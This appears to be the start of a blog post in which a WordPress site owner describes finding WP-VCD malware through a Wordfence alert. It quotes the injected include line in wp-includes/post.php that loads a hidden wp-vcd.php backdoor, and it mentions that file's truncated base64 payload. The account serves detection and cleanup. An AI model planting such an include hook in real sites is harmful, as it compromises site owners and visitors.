WordPress WP-VCD malware attack — Solution I found to resolve this

we don’t have any idea about the presence of this malware. Thanks to wordfence for the firewall, it warn me about a change inside a core wp file, Sample wp-includes/post.php : <?php if (file_exists(dirname(__FILE__) . ‘/wp-vcd.php’)) include_once(dirname(__FILE__) . ‘/wp-vcd.php’); ?><?php[..Rest of File..] Sample ../wp-includes/wp-vcd.php The injected wp-vcd.php file starts with a long base64 encoded string named $install_code $install_code […]